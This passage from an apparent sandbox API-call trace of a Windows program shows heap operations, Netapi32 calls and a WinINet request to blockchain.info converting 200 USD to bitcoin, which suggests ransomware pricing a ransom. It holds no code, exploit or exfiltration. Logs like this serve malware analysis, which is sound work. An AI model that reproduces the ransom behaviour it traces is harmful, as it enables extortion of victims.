(HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e94f8 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80e8 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80b8 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83d0 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8088 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2360 [0244.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8088 | out: hHeap=0x8a0000) returned 1 [0244.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2360 | out: hHeap=0x8a0000) returned 1 [0244.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83d0 | out: hHeap=0x8a0000) returned 1 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83d0 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8088 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c85e0 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2360 [0244.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xac1f98 | out: hHeap=0x8a0000) returned 1 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c85c8 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8598 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c85b0 [0244.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c85b0 | out: hHeap=0x8a0000) returned 1 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8598 | out: hHeap=0x8a0000) returned 1 [0244.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8598 [0244.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c85b0 [0244.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8580 [0244.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8580 | out: hHeap=0x8a0000) returned 1 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c85b0 | out: hHeap=0x8a0000) returned 1 [0244.241] FreeLibrary (hLibModule=0x74390000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2520 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e6b0 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba660 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba480 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f68 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c82c8 | out: hHeap=0x8a0000) returned 1 [0244.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8010 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8118 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8238 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db960 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0244.253] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e92d0 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e92d0 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0244.253] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e6b0 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8238 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8238 | out: hHeap=0x8a0000) returned 1 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed90 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8238 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8118 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8118 | out: hHeap=0x8a0000) returned 1 [0244.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2510 [0244.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.254] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2edb8 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8118 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8010 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2510 [0244.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c83b8 | out: hHeap=0x8a0000) returned 1 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfa8 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2520 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c82c8 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1910 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e7f0 [0244.254] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0244.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e7f0 | out: hHeap=0x8a0000) returned 1 [0244.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e7f0 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e24c0 [0244.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed40 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c7f68 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed68 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c50 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e23f0 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8130 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db960 [0244.255] PeekMessageW (in: lpMsg=0x87e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e8fc) returned 0 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c84c0 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8040 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c80 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e21a0 [0244.255] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8280 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2290 [0244.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8100 [0244.256] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74370000 [0244.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8310 [0244.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0244.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0244.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0xc6b630 [0244.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0xc6b630, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0244.267] NetApiBufferSize (in: Buffer=0xc1afe0, ByteCount=0x87e298 | out: ByteCount=0x87e298) returned 0x0 [0244.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e92d0 [0244.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c8328 [0244.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c82f8 [0244.267] FreeLibrary (hLibModule=0x74370000) returned 1 [0244.271] PeekMessageW (in: lpMsg=0x87e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e8fc) returned 0 [0244.305] PeekMessageW (in: lpMsg=0x87e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e8fc) returned 0 [0244.305] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0244.305] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.305] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.305] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0244.305] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x74390000 [0244.318] NetApiBufferFree (Buffer=0xc1afe0) returned 0x0 [0244.318] FreeLibrary (hLibModule=0x74390000) returned 1 [0244.322] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.322] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0244.322] InternetCrackUrlW (in: lpszUrl="https://blockchain.info/tobtc?currency=USD&value=200", dwUrlLength=0x34, dwFlags=0x0, lpUrlComponents=0x87f320 | out: lpUrlComponents=0x87f320) returned 1 [0244.323] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0244.323] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x87f368, dwBufferLength=0x8) returned 1 [0244.323] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x87f374 | out: lpBuffer=0x0, lpdwBufferLength=0x87f374) returned 0 [0244.440] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x9bc928, lpdwBufferLength=0x87f374 | out: lpBuffer=0x9bc928, lpdwBufferLength=0x87f374) returned 1 [0244.440] InternetConnectW (hInternet=0xcc0004, lpszServerName="blockchain.info", nServerPort=0x1bb, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0244.440] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/tobtc?currency=USD&value=200", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0244.440] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0244.687] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x87f328, lpdwBufferLength=0x87f320, lpdwIndex=0x87f324*=0x0 | out: lpBuffer=0x87f328*, lpdwBufferLength=0x87f320*=0x4, lpdwIndex=0x87f324*=0x0) returned 1 [0244.688] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x87f344, lpdwBufferLength=0x87f370, lpdwIndex=0x87f374*=0x0 | out: lpBuffer=0x87f344, lpdwBufferLength=0x87f370, lpdwIndex=0x87f374*=0x0) returned 0 [0244.688] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x87f2a8 | out: lpCharType=0x87f2a8) returned 1 [0244.688] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x87f324, dwFlags=0x0, dwContext=0x0) returned 1 [0244.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba4c8 [0244.688] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ba4c8, dwNumberOfBytesToRead=0xa, lpdwNumberOfBytesRead=0x87f328 | out: lpBuffer=0x9ba4c8*, lpdwNumberOfBytesRead=0x87f328*=0xa) returned 1 [0244.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef98 [0244.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25a8 [0244.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba5d0 [0244.688] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ba5d0, dwNumberOfBytesToRead=0xa, lpdwNumberOfBytesRead=0x87f328 | out: lpBuffer=0x9ba5d0*, lpdwNumberOfBytesRead=0x87f328*=0x0) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0244.688] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d498 | out: hHeap=0x8a0000) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0244.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd030 [0244.689] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0244.689] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0244.689] CloseHandle (hObject=0x0) returned 0 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25a8 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef98 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3f820 | out: hHeap=0x8a0000) returned 1 [0244.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed40 | out: hHeap=0x8a0000) returned 1 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed40 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef98 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba300 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.690] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2380 [0244.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bca00 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba4c8 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e23f0 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0xbd1170 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9ba4c8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0xc6b630 [0244.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9ba4c8, cbMultiByte=11, 